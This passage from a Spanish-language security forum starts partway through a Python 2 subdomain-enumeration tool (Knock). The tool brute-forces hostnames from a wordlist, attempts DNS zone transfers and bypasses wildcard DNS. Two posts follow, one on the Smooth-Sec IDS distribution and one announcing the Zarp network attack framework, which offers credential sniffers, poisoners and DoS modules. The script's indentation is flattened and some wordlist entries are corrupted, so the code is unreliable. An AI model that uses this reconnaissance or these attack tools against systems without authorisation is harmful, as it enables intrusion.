","db01","db02","db1","db2","dc","de","dealers","dec","def","default","defiant","delaware","dell","delta","delta1","demo","demonstration","demos","denver","depot","des","desarrollo","descargas","design","designer","detroit","dev","dev0","dev01","dev1","devel","develop","developer","developers","development","device","devserver","devsql","dhcp","dial","dialup","digital","dilbert","dir","direct","directory","disc","discovery","discuss","discussion","discussions","disk","disney","distributer","distributers","dj","dk","dm","dmail","dmz","dnews","dns","dns-2","dns0","dns1","dns2","dns3","do","docs","documentacion","documentos","domain","domains","dominio","domino","dominoweb","doom","download","downloads","downtown","dragon","drupal","dsl","dyn","dynamic","dynip","dz","e","e-com","e-commerce","e0","eagle","earth","east","ec","echo","ecom","ecommerce","edi","edu","education","edward","ee","eg","eh","ejemplo","elpaso","email","employees","empresa","empresas","en","enable","eng","eng01","eng1","engine","engineer","engineering","enterprise","epsilon","er","erp","es","esd","esm","espanol","estadisticas","esx","et","eta","europe","events","domain","exchange","exec","extern","external","extranet","f","f5","falcon","farm","faststats","fax","feedback","feeds","fi","field","file","files","fileserv","fileserver","filestore","filter","find","finger","firewall","fix","fixes","fj","fk","fl","flash","florida","flow","fm","fo","foobar","formacion","foro","foros","fortworth","forum","forums","foto","fotos","foundry","fox","foxtrot","fr","france","frank","fred","freebsd","freebsd0","freebsd01","freebsd02","freebsd1","freebsd2","freeware","fresno","front","frontdesk","fs","fsp","ftp","ftp-","ftp0","ftp2","ftp_","ftpserver","fw","fw-1","fw1","fwsm","fwsm0","fwsm01","fwsm1","g","ga","galeria","galerias","galleries","gallery","games","gamma","gandalf","gate","gatekeeper","gateway","gauss","gd","ge","gemini","general","george","georgia","germany","gf","gg","gh","gi","gl","glendale","gm","gmail","gn","go","gold","goldmine","golf","gopher","gp","gq","gr","green","group","groups","groupwise","gs","gsx","gt","gu","guest","gw","gw1","gy","h","hal","halflife","hawaii","hello","help","helpdesk","helponline","henry","hermes","hi","hidden","hk","hm","hn","hobbes","hollywood","home","homebase","homer","honeypot","honolulu","host","host1","host3","host4","host5","hotel","hotjobs","houstin","houston","howto","hp","hpov","hr","ht","http","https","hu","hub","humanresources","i","ia","ias","ibm","ibmdb","id","ida","idaho","ids","ie","iis","il","illinois","im","images","imail","imap","imap4","img","img0","img01","img02","in","inbound","inc","include","incoming","india","indiana","indianapolis","info","informix","inside","install","int","intern","internal","international","internet","intl","intranet","invalid","investor","investors","invia","invio","io","iota","iowa","iplanet","ipmonitor","ipsec","ipsec-gw","iq","ir","irc","ircd","ircserver","ireland","iris","irvine","irving","is","isa","isaserv","isaserver","ism","israel","isync","it","italy","ix","j","japan","java","je","jedi","jm","jo","jobs","john","jp","jrun","juegos","juliet","juliette","juniper","k","kansas","kansascity","kappa","kb","ke","kentucky","kerberos","keynote","kg","kh","ki","kilo","king","km","kn","knowledgebase","knoxville","koe","korea","kp","kr","ks","kw","ky","kz","l","la","lab","laboratory","labs","lambda","lan","laptop","laserjet","lasvegas","launch","lb","lc","ldap","legal","leo","li","lib","library","lima","lincoln","link","linux","linux0","linux01","linux02","linux1","linux2","lista","lists","listserv","listserver","live","lk","load","loadbalancer","local","localhost","log","log0","log01","log02","log1","log2","logfile","logfiles","logger","logging","loghost","login","logs","london","longbeach","losangeles","lotus","louisiana","lr","ls","lt","lu","luke","lv","ly","lyris","m","ma","mac","mac1","mac10","mac11","mac2","mac3","mac4","mac5","mach","macintosh","madrid","mail","mail2","mailer","mailgate","mailhost","mailing","maillist","maillists","mailroom","mailserv","mailsite","mailsrv","main","maine","maint","mall","manage","management","manager","manufacturing","map","mapas","maps","marketing","marketplace","mars","marvin","mary","maryland","massachusetts","master","max","mc","mci","md","mdaemon","me","media","member","members","memphis","mercury","merlin","messages","messenger","mg","mgmt","mh","mi","miami","michigan","mickey","midwest","mike","milwaukee","minneapolis","minnesota","mirror","mis","mississippi","missouri","mk","ml","mm","mn","mngt","mo","mobile","mom","monitor","monitoring","montana","moon","moscow","movies","mozart","mp","mp3","mpeg","mpg","mq","mr","mrtg","ms","ms-exchange","ms-sql","msexchange","mssql","mssql0","mssql01","mssql1","mt","mta","mtu","mu","multimedia","music","mv","mw","mx","my","mysql","mysql0","mysql01","mysql1","mz","n","na","name","names","nameserv","nameserver","nas","nashville","nat","nc","nd","nds","ne","nebraska","neptune","net","netapp","netdata","netgear","netmeeting","netscaler","netscreen","netstats","network","nevada","new","newhampshire","newjersey","newmexico","neworleans","news","newsfeed","newsfeeds","newsgroups","newton","newyork","newzealand","nf","ng","nh","ni","nigeria","nj","nl","nm","nms","nntp","no","node","nokia","nombres","nora","north","northcarolina","northdakota","northeast","northwest","noticias","novell","november","np","nr","ns","ns-","ns0","ns01","ns02","ns1","ns2","ns3","ns4","ns5","ns_","nt","nt4","nt40","ntmail","ntp","ntserver","nu","null","nv","ny","nz","o","oakland","ocean","odin","office","offices","oh","ohio","ok","oklahoma","oklahomacity","old","om","omaha","omega","omicron","online","ontario","open","openbsd","openview","operations","ops","ops0","ops01","ops02","ops1","ops2","opsware","or","oracle","orange","order","orders","oregon","orion","orlando","oscar","out","outbound","outgoing","outlook","outside","ov","owa","owa01","owa02","owa1","owa2","ows","oxnard","p","pa","page","pager","pages","paginas","papa","paris","parners","partner","partners","patch","patches","paul","payroll","pbx","pc","pc01","pc1","pc10","pc101","pc11","pc12","pc13","pc14","pc15","pc16","pc17","pc18","pc19","pc2","pc20","pc21","pc22","pc23","pc24","pc25","pc26","pc27","pc28","pc29","pc3","pc30","pc31","pc32","pc33","pc34","pc35","pc36","pc37","pc38","pc39","pc4","pc40","pc41","pc42","pc43","pc44","pc45","pc46","pc47","pc48","pc49","pc5","pc50","pc51","pc52","pc53","pc54","pc55","pc56","pc57","pc58","pc59","pc6","pc60","pc7","pc8","pc9","pcmail","pda","pdc","pe","pegasus","pennsylvania","peoplesoft","personal","pf","pg","pgp","ph","phi","philadelphia","phoenix","phoeniz","phone","phones","photos","pi","pics","pictures","pink","pipex-gw","pittsburgh","pix","pk","pki","pl","plano","platinum","pluto","pm","pm1","pn","po","policy","polls","pop","pop3","portal","portals","portfolio","portland","post","posta","posta01","posta02","posta03","postales","postoffice","ppp1","ppp10","ppp11","ppp12","ppp13","ppp14","ppp15","ppp16","ppp17","ppp18","ppp19","ppp2","ppp20","ppp21","ppp3","ppp4","ppp5","ppp6","ppp7","ppp8","ppp9","pptp","pr","prensa","press","print >> sys.stdout,er","print >> sys.stdout,serv","print >> sys.stdout,server","priv","privacy","private","problemtracker","products","profiles","project","projects","promo","proxy","prueba","pruebas","ps","psi","pss","pt","pub","public","pubs","purple","pw","py","q","qa","qmail","qotd","quake","quebec","queen","quotes","r","r01","r02","r1","r2","ra","radio","radius","rapidsite","raptor","ras","rc","rcs","rd","re","read","realserver","recruiting","red","redhat","ref","reference","reg","register","registro","registry","regs","relay","rem","remote","remstats","reports","research","reseller","reserved","resumenes","rho","rhodeisland","ri","ris","rmi","ro","robert","romeo","root","rose","route","router","router1","rs","rss","rtelnet","rtr","rtr01","rtr1","ru","rune","rw","rwhois","s","s1","s2","sa","sac","sacramento","sadmin","safe","sales","saltlake","sam","san","sanantonio","sandiego","sanfrancisco","sanjose","saskatchewan","saturn","sb","sbs","sc","scanner","schedules","scotland","scotty","sd","se","search","seattle","sec","secret","secure","secured","securid","security","sendmail","seri","serv","serv2","server","server1","servers","service","services","servicio","servidor","setup","sg","sh","shared","sharepoint","shareware","shipping","shop","shoppers","shopping","si","siebel","sierra","sigma","signin","signup","silver","sim","sirius","site","sj","sk","skywalker","sl","slackware","slmail","sm","smc","sms","smtp","smtphost","sn","sniffer","snmp","snmpd","snoopy","snort","so","socal","software","sol","solaris","solutions","soporte","source","sourcecode","sourcesafe","south","southcarolina","southdakota","southeast","southwest","spain","spam","spider","spiderman","splunk","spock","spokane","springfield","sprint >> sys.stdout,","sqa","sql","sql0","sql01","sql1","sql7","sqlserver","squid","sr","ss","ssh","ssl","ssl0","ssl01","ssl1","st","staff","stage","staging","start","stat","static","statistics","stats","stlouis","stock","storage","store","storefront","streaming","stronghold","strongmail","studio","submit","subversion","sun","sun0","sun01","sun02","sun1","sun2","superman","supplier","suppliers","support","sv","sw","sw0","sw01","sw1","sweden","switch","switzerland","sy","sybase","sydney","sysadmin","sysback","syslog","syslogs","system","sz","t","tacoma","taiwan","talk","tampa","tango","tau","tc","tcl","td","team","tech","technology","techsupport","telephone","telephony","telnet","temp","tennessee","terminal","terminalserver","termserv","test","test2k","testbed","testing","testlab","testlinux","testo","testserver","testsite","testsql","testxp","texas","tf","tftp","tg","th","thailand","theta","thor","tienda","tiger","time","titan","tivoli","tj","tk","tm","tn","to","tokyo","toledo","tom","tool","tools","toplayer","toronto","tour","tp","tr","tracker","train","training","transfers","trinidad","trinity","ts","ts1","tt","tucson","tulsa","tumb","tumblr","tunnel","tv","tw","tx","tz","u","ua","uddi","ug","uk","um","uniform","union","unitedkingdom","unitedstates","unix","unixware","update","updates","upload","ups","upsilon","uranus","urchin","us","usa","usenet","user","users","ut","utah","utilities","uy","uz","v","va","vader","vantive","vault","vc","ve","vega","vegas","vend","vendors","venus","vermont","vg","vi","victor","video","videos","viking","violet","vip","virginia","vista","vm","vmserver","vmware","vn","vnc","voice","voicemail","voip","voyager","vpn","vpn0","vpn01","vpn02","vpn1","vpn2","vt","vu","w","w1","w2","w3","wa","wais","wallet","wam","wan","wap","warehouse","washington","wc3","web","webaccess","webadmin","webalizer","webboard","webcache","webcam","webcast","webdev","webdocs","webfarm","webhelp","weblib","weblogic","webmail","webmaster","webproxy","webring","webs","webserv","webserver","webservices","website","websites","websphere","websrv","websrvr","webstats","webstore","websvr","webtrends","welcome","west","westvirginia","wf","whiskey","white","whois","wi","wichita","wiki","wililiam","win","win01","win02","win1","win2","win2000","win2003","win2k","win2k3","windows","windows01","windows02","windows1","windows2","windows2000","windows2003","windowsxp","wingate","winnt","winproxy","wins","winserve","winxp","wire","wireless","wisconsin","wlan","wordpress","work","world","write","ws","ws1","ws10","ws11","ws12","ws13","ws2","ws3","ws4","ws5","ws6","ws7","ws8","ws9","wusage","wv","ww","www","www-","www-01","www-02","www-1","www-2","www-int","www0","www01","www02","www1","www2","www3","www_","wwwchat","wwwdev","wwwmail","wy","wyoming","x","x-ray","xi","xlogan","xmail","xml","xp","y","yankee","ye","yellow","young","yt","yu","z","z-log","za","zebra","zera","zeus","zlog","zm","zulu","zw"]

def zonetransfer(URL): # Zone Transfer
try:
import dns.query, dns.zone, dns.resolver
print >> sys.stdout, "[+] Getting NS records for", URL+"\n"
answers = dns.resolver.query(URL, 'NS')
ns = []
for rdata in answers:
n = str(rdata)
print >> sys.stdout, "\tFound name server:", n
ns.append(n)
print >> sys.stdout
for n in ns:
print >> sys.stdout, "[+] Trying a zone transfer for %s from name server %s" % (URL, n)
try:
  zone = dns.zone.from_xfr(dns.query.xfr(ns[0], URL))
  for name, node in zone.nodes.items():
      rdataset = node.rdatasets
      for record in rdataset:
          print >> sys.stdout, "\n%s\t%s" % (name, record)
  #break
  print >> sys.stdout
except:
  pass

except(ImportError):
print >> sys.stdout, "\nSorry, dnspython module missing."
print >> sys.stdout, "\tDownload dnspython module from [ http://www.dnspython.org/ ]\n"
sys.exit(0)

def rnd(): # Random String
alphabet = 'abcdefghijklmnopqrstuvwxyz'
min = 5
max = 15
total = 2
global rndString
for count in xrange(1,total):
  for x in random.sample(alphabet,random.randint(min,max)):
      rndString+=x

errcode=''
def get_url(host): # Test Wildcard
try:
h = httplib.HTTP(host)
h.putrequest('GET', '/')
h.putheader('Accept', 'text/xml')
h.putheader('User-Agent', 'knock.py')
h.endheaders()
global errcode
errcode, errmsg, headers = h.getreply()
f = h.getfile()
global data
data = f.read() # Get HTML Data
#print >> sys.stdout, data
f.close()
h.close()
print >> sys.stdout, line+"."+URL
except:
pass

def bypasswildcard(URL,EXCLUDE): # bypass wildcard, use internal wordlist
hostlist = ''
count = 0
print >> sys.stdout, "[+] Bypass wildcard"
startTime = time.time()
for line in wlist_array:
get_url(line+'.'+URL)
if not EXCLUDE in data:
count = count + 1
subdomain = line+"."+URL
print >> sys.stdout, "".join([s.center(25) for s in (subdomain,'')])

seconds = time.time() - t
print >> sys.stdout, "\nFound %s subdomain(s) in %s second(s)" % (str(count),str(round(seconds,2)))

def bypasswildcardwl(URL,EXCLUDE,WORDLIST): # bypass wildcard, use external wordlist
hostlist = ''
count = 0
print >> sys.stdout, "[+] Bypass wildcard"
startTime = time.time()
try:
wordlist = open(WORDLIST,'r')
wlist = wordlist.read().split('\n')
#timestimed = len(wlist) * endTime
except:
print >> sys.stdout, "[!] Error wordlist\n\n\tNo wordlist. File not found."
sys.exit(0)
for line in wlist:
if line != '':
get_url(line+'.'+URL)
if not EXCLUDE in data:
count = count + 1
subdomain = line+"."+URL
print >> sys.stdout, "".join([s.center(25) for s in (subdomain,'')])


seconds = time.time() - t
print >> sys.stdout, "\nFound %s subdomain(s) in %s second(s)" % (str(count),str(round(seconds,2)))


def subdomainAuto(URL): # wordlist by array
domain = ''
hostlist = ''
count = 0
totcount = 0
print >> sys.stdout, "\n[+] Scanning for subdomain on " + str(URL)
print >> sys.stdout, "[!] Wordlist not specified. I scannig with my internal wordlist..."
timestimed = len(wlist_array) * endTime
print >> sys.stdout, "    Estimated time about "+str(round(timestimed,2))+" seconds\n"
print >> sys.stdout, "".join([s.center(25) for s in ("Subdomain","Ip address","Name server\n")])
for line in wlist_array:
try:
s = socket.gethostbyname(line+"."+URL)
if (s):
soc = socket.gethostbyname_ex(line+"."+URL)
if (soc):
dnsarray = len(soc[2])
for dns in range(0, dnsarray):
name = socket.gethostbyaddr(soc[2][dns])

if hostlist.find(s) < 0:
count = count + 1
totcount = totcount + 1
subdomain = line+"."+URL
print >> sys.stdout, "".join([s.center(25) for s in (subdomain,soc[2][dns],name[0])])

soc.close()
s.close()
except:
pass
seconds = time.time() - t
print >> sys.stdout, "\nFound %s subdomain(s) in %s host(s) in %s second(s)" % (str(totcount),str(count),str(round(seconds,2)))



def subdomain(URL, WORDLIST): # wordlist by file
hostlist = ''
count = 0
totcount = 0
try:
wordlist = open(WORDLIST,'r')
wlist = wordlist.read().split('\n')
timestimed = len(wlist) * endTime
except:
print >> sys.stdout, "[!] Error wordlist\n\n\tNo wordlist. File not found."
sys.exit(0)
print >> sys.stdout, "[+] Scanning for subdomain on " + str(URL)
print >> sys.stdout, "\tEstimated time about "+str(round(timestimed,2))+" seconds\n"
print >> sys.stdout, "".join([s.center(25) for s in ("Subdomain","Ip address","Name server\n")])
for line in wlist:
try:
s = socket.gethostbyname(line+"."+URL)
if (s):
soc = socket.gethostbyname_ex(line+"."+URL)
if (soc):
dnsarray = len(soc[2])
for dns in range(0, dnsarray):
name = socket.gethostbyaddr(soc[2][dns])

if hostlist.find(s) < 0:
count = count + 1
totcount = totcount + 1
subdomain = line+"."+URL
print >> sys.stdout, "".join([s.center(25) for s in (subdomain,soc[2][dns],name[0])])

soc.close()
s.close()
except:
pass
wordlist.close()
seconds = time.time() - t
print >> sys.stdout, "\nFound %s subdomain(s) in %s host(s) in %s second(s)" % (str(totcount),str(count),str(round(seconds,2)))


def help():
print >> sys.stdout, "USAGE:"
print >> sys.stdout, "\tScanning with internal wordlist:"
print >> sys.stdout, "\t\tknock [url]\n\t\te.g.\tknock domain.com"
print >> sys.stdout, "\tScanning with external wordlist:"
print >> sys.stdout, "\t\tknock [url] [wordlist]\n\t\te.g.\tknock domain.com wordlist.txt"
print >> sys.stdout, "OPTIONS:\n"
print >> sys.stdout, "\t-zt\tZone Transfer discovery:"
print >> sys.stdout, "\t\tknock -zt [url]\n\t\te.g.\tknock -zt domain.com"
print >> sys.stdout, "\t-wc\tWildcard testing:"
print >> sys.stdout, "\t\tknock -wc [url]\n\t\te.g.\tknock -wc domain.com"
print >> sys.stdout, "\t-dns\tDns resolving:"
print >> sys.stdout, "\t\tknock -dns [url]\n\t\te.g.\tknock -dns domain.com"
print >> sys.stdout, "\t-bw\tBypass wildcard:"
print >> sys.stdout, "\t\tknock -bw [stringexclude] [url]\n\t\te.g.\tknock -bw 404 domain.com"
sys.exit()

def testdomain():
try:
stest = socket.gethostbyname("www."+URL)
if (stest):
print >> sys.stdout, "[+] Testing domain"
domaintest = "\twww."+URL
stest = stest
print >> sys.stdout, "".join([s.center(25) for s in (domaintest, stest)])
except:
help()
#print >> sys.stdout, "Error:\n\tHost not valid."
#sys.exit(0)

def testwildcard():
print >> sys.stdout, "[+] Testing wildcard"
a = 0
global rndString
global errcode
global endTime
startTime = time.time()
rndString=''
rnd()
#print >> sys.stdout, rndString
get_url(rndString+'.'+URL) # test wildcard
#print >> sys.stdout, errcode
endTime = (time.time() - startTime) / 4
if errcode <> '':
print >> sys.stdout, data
#print >> sys.stdout, "\tRequest response:", errcode
print >> sys.stdout, '\tWildcard enabled! Try with -bw option'
print >> sys.stdout, '\tExample: knock -bw 404 '+URL
sys.exit(0)
else:
print >> sys.stdout, "\tOk, no wildcard found."

def dnsresolve(foo):
print >> sys.stdout, "[+] Dns resolving"
try:
s_dns = socket.gethostbyname_ex(foo)
if (s_dns):
print >> sys.stdout, "".join([s.center(25) for s in ("Domain name","Ip address","Name server")])
dnsarray = len(s_dns[2])
for dns in range(0, dnsarray):
name = socket.gethostbyaddr(s_dns[2][dns])
print >> sys.stdout, "".join([s.center(25) for s in (foo, s_dns[2][dns], name[0] )])
print >> sys.stdout, "Found "+str(dnsarray)+" host(s) for "+foo
except:
print >> sys.stdout, "\tNo address associated with hostname " + foo
pass


################### MAIN ######################


print >> sys.stdout, "Knock v1.5 by Gianni 'guelfoweb' Amato ( http://knock.googlecode.com )\n"

if len(sys.argv) < 2 or len(sys.argv) > 5:
help()

if len(sys.argv) == 2:
URL = sys.argv[1]
t = time.time()
testdomain()
dnsresolve(URL)
testwildcard()
subdomainAuto(URL)
sys.exit(0)


if len(sys.argv) == 3:
URL = sys.argv[2]
if sys.argv[1] == '-td': # Testing domain (out of help)
testdomain()
#dnsresolve(URL)
sys.exit(0)
if sys.argv[1] == '-zt': # Zone Transfer
testdomain()
dnsresolve(URL)
zonetransfer(URL)
sys.exit(0)
if sys.argv[1] == '-wc': # Wildcard
testdomain()
testwildcard()
sys.exit(0)
if sys.argv[1] == '-dns': # Dns resolve
testdomain()
dnsresolve(URL)
sys.exit(0)

if len(sys.argv) == 4 and sys.argv[1] == '-bw':
EXCLUDE = sys.argv[2]
URL = sys.argv[3]
t = time.time()
testdomain()
dnsresolve(URL)
bypasswildcard(URL,EXCLUDE)
sys.exit(0)

if len(sys.argv) == 5 and sys.argv[1] == '-bw':
EXCLUDE = sys.argv[2]
URL = sys.argv[3]
WORDLIST = sys.argv[4]
t = time.time()
testdomain()
dnsresolve(URL)
bypasswildcardwl(URL,EXCLUDE,WORDLIST)
sys.exit(0)
else:
URL = sys.argv[1]
t = time.time()
testdomain()
dnsresolve(URL)
testwildcard()
WORDLIST = sys.argv[2]
subdomain(URL, WORDLIST)
sys.exit(0)



Las características actuales:

Scan subdominios
Solicitud de DNS para la transferencia de zona
Resolución de DNS
Pruebas Comodín
Derivación Comodín


Es necesaria la instalacion de python,

Web de Descargas: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Saludos !
#119
Smooth-Sec es un sistema de detección de intrusiones IDS / IPS cuyo motor está basado en Suricata y con una interface web Snorby.


Está montado sobre Linux UBUNTU 10.04 LTS. Se trada de un sistema completamente configurado y listo para usarse.  Creado por Phillip Bailey.

los dos principales componentes de Smooth-Sec:  Suricata y Snorby.

Suricata:

Se trata de motor IDS/IPS de The Open Information Security Foundation. Es Open Source y tiene unas características especiales que hacen de Suricata un motor muy interesante. Además es totalmente compatible con las reglas Snort y Emerging Threads.

Destacamos entre las características de Suricata:

Multi-Threaded Processing. Una de la  características más importantes de Suricata que permite la ejecución de varios procesos / subprocesos de forma simultánea. Podemos entonces asignar el número de subprocesos por CPU / Cores y qué subprocesos. De esta forma es capaz, entre otras cosas, de porcesar una gran cantidad de paquetes de forma simultánea aumentando así el rendimiento.


Automatic Protocol Detection. A parte de los protocolos IP, TCP, UDP e ICMP, Suricata tiene palabras claves para otros protocolos como FTP, HTTP, TLS, SMB.  De esa forma podemos escribir reglas independientemente del puerto que un protocolo use, ya sea por defecto o no ya que éste es automáticamente detectado.

Performance Statistics. Estadísticas y análisis de rendimiento. Estas estádísticas se vuelcan el en archivo /var/log/suricata/stat.log.

HTTP Log Module. Suricata, independientemente de las alertas, vuelca todas las peticiones HTTP (tanto desde HOME_NET > EXTERNAl_NET como en el sentido ciontrario) en un archivo /var/log/http.log. El registro de estas peticiones se almacenan en formato de Log Apache.

Descompresión Gzip por parte del analizador HTTP.

Soporta, al igual que Snort, Unified2 Output.

Soporta IPv6.

Snorby:

Snorby es un front-end web, para la gestión de alertas IDS/IPS basado en sensores. En el caso de Smooth-Sec basado en motor Suricata. Su interface gráfica es muy sencilla con una visión amplia e intuitiva de la visualización de las alertas.

En resúmen, con Snorby podemos tener una visión rápida de las alertas generadas por los distintos sensores suricata mediante una interfaz intuitiva y atractiva.

La versión que usa Smooth-Sec de Snorby es 2.2.5

Instalación de Smooth-Sec.
Descargamos la .iso desde aquí: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Instalamos un una máquina física o mediante VMWare.

Una vez que arrancamos con la .iso:

- usamos la opción de install to hard disk.
- la instalacion es muy sencilla e incluye las operaciones normales de una instalación Debian / Ubuntu, tales como configuración de particiones, guiadas o no,  GRUB , etc.
- una vez realizada la instalación reiniciamos.
- indicamos password para la cuenta root.
- seguimos las indiocacio nes de la instalación.
- configuramos la interface de red.
- reinciamos.
- una pantalla nos indica, en base a la IP configurada, la fora de acceder a la interface web Snorby mediante https (02).


En esta misma pantalla: Advanced Menu > Quit, podemos acceder a línea de comandos para la configuración avanzada de Smooth-Sec.
accedemos mediante https://IP:443/ y se nos pide usuario y contraseña que serán : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta / snorby.

Smooth-Sec funcionando.
Desde el Dashboard o pantalla principal de Snorby > Administración (arriba derecha en rojo) > Administrator menu > Worker & JoB Queue, vemos que todo está correcto y funcionando:


Vemos que también se están generando los archivos de alerta en /var/log/suricata así como el formato unified2 para Snorby:


fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Un poco de configuracion de snort aqui : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Suricata : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Saludos !
#120
Python / Zarp - Network Attack Framework
Julio 10, 2013, 02:31:24 AM
Zarp es una herramienta escrita en python de ataque a redes en entornos locales. Posee varias herramientas
como sniffers los cuales permiten analizar automáticamente los nombres de usuario y contraseñas de diversos protocolos,
así como ver el tráfico HTTP y más.

entre sus funciones estan:

- Poisoners
- Parameter
- Services
- Sessions
- Scanners
- DoS Attacks
- Sniffers



Descarga: git clone No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Mas informacion: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Saludos !